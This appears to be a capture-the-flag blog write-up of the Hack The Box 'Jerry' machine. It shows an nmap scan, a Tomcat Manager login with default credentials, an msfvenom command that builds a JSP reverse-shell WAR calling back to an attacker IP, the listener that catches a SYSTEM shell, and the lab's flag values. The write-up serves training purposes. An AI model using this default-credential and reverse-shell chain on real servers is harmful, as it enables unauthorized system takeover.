Post

HTB: Jerry [Easy]

Posted Updated
Preview Image
By Lukman Azri
5 min read
HTB: Jerry [Easy]

This is an easy Windows machine with Apache Tomcat running on port 8080. Default and weak credentials allow access to the Tomcat Manager. By uploading a simple WAR reverse shell, we get a system-level shell and read both flags quickly, with no privilege escalation needed.

Tools

  • nmap
  • msfvenom
  • penelope

Initial Discovery

Nmap scan result:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ nmap -sCV -p- -T4 -vvv jerry.htb                                                                                                                                                         
Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-22 11:25 +08
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:25
Completed NSE at 11:25, 0.00s elapsed
Initiating Ping Scan at 11:25
Scanning jerry.htb (10.10.10.95) [4 ports]
Completed Ping Scan at 11:25, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:25
Scanning jerry.htb (10.10.10.95) [65535 ports]
Discovered open port 8080/tcp on 10.10.10.95
SYN Stealth Scan Timing: About 19.01% done; ETC: 11:28 (0:02:12 remaining)
SYN Stealth Scan Timing: About 48.05% done; ETC: 11:27 (0:01:06 remaining)
SYN Stealth Scan Timing: About 69.46% done; ETC: 11:28 (0:00:40 remaining)
Completed SYN Stealth Scan at 11:27, 123.69s elapsed (65535 total ports)
Initiating Service scan at 11:27
Scanning 1 service on jerry.htb (10.10.10.95)
Completed Service scan at 11:27, 6.05s elapsed (1 service on 1 host)
NSE: Script scanning 10.10.10.95.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:27
Completed NSE at 11:28, 5.06s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.19s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Nmap scan report for jerry.htb (10.10.10.95)
Host is up, received echo-reply ttl 127 (0.018s latency).
Scanned at 2025-12-22 11:25:49 +08 for 136s
Not shown: 65534 filtered tcp ports (no-response)
PORT     STATE SERVICE REASON          VERSION
8080/tcp open  http    syn-ack ttl 127 Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-favicon: Apache Tomcat

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:28
Completed NSE at 11:28, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 135.50 seconds
           Raw packets sent: 131167 (5.771MB) | Rcvd: 181 (21.468KB)

From the scan result, we identify there’s Apache Tomcat/Coyote JSP running service on port 8080 .Then i would add the hostname as jerry.htb for local known dns which located at /etc/hosts

Navigated http[:]//jerry[.]htb[:]8080 and it appear to be running with Apache Tomcat/7.0.88.

image

After a little bit of information gathering, i find when visiting Server Status required for username and password. I tried with admin:admin and we are authorized.

image

However when we try to access List Application, i wasn’t able to gain access and it brought us to 401 Access Denied page instead.

image

The Tomcat Manager interface was misconfigured and left using default/example credentials. Authenticating as tomcat:s3cret, which has the manager-gui role, grants access to the Manager GUI and the list of deployed applications.

image

Exploitation

Verify if the user tomcat is valid user and we are authorized. We can upload our own revshell payload through deploy .war file upload.

image

image

image

First generate our payload by using msfvenom.

1
2
3
4
5

┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.16.2 LPORT=4444 -f war -o payload.war
Payload size: 1104 bytes
Final size of war file: 1104 bytes
Saved as: payload.war

Setup a listener with the same port as our payload. And we will be using penelope for that:

1
2
3
4
5

┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ penelope                              
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.134.128 • 172.18.0.1 • 172.17.0.1 • 10.10.16.2
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)

Upload our payload through deploy and simply interact with the payload from list.

image

Get a shell through our penelope as authority\system

1
2
3
4
5
6
7
8
9
10
11
12

┌──(kali㉿kali)-[~/Desktop/HTB/Jerry]
└─$ penelope                              
[+] Listening for reverse shells on 0.0.0.0:4444 →  127.0.0.1 • 192.168.134.128 • 172.18.0.1 • 172.17.0.1 • 10.10.16.2
➤  🏠 Main Menu (m) 💀 Payloads (p) 🔄 Clear (Ctrl-L) 🚫 Quit (q/Ctrl-C)
[+] Got reverse shell from JERRY~10.10.10.95-Microsoft_Windows_Server_2012_R2_Standard-x64-based_PC 😍 Assigned SessionID <1>
[+] Added readline support...
[+] Interacting with session [1], Shell Type: Readline, Menu key: Ctrl-D 
[+] Logging to /home/kali/.penelope/sessions/JERRY~10.10.10.95-Microsoft_Windows_Server_2012_R2_Standard-x64-based_PC/2025_12_22-11_54_22-292.log 📜
──────────────────────────────────────────────────────────────────────────────────────────────
whoami
whoami
nt authority\system

We can find the flag located inside “C:\Users\Administrator\Desktop\flags”, use type to read the content and we get both user and root flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

C:\Users\Administrator\Desktop>cd flags
cd flags

C:\Users\Administrator\Desktop\flags>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,419,851,264 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004dbcef0f854e0fb401875f26ebd00

root.txt
04a8b36e1545a455393d067e772fe90

badge

HTB, Easy, Linux
HTB Easy JSP Bypass msfvenom Boot2Root
This post is licensed under CC BY 4.0 by the author.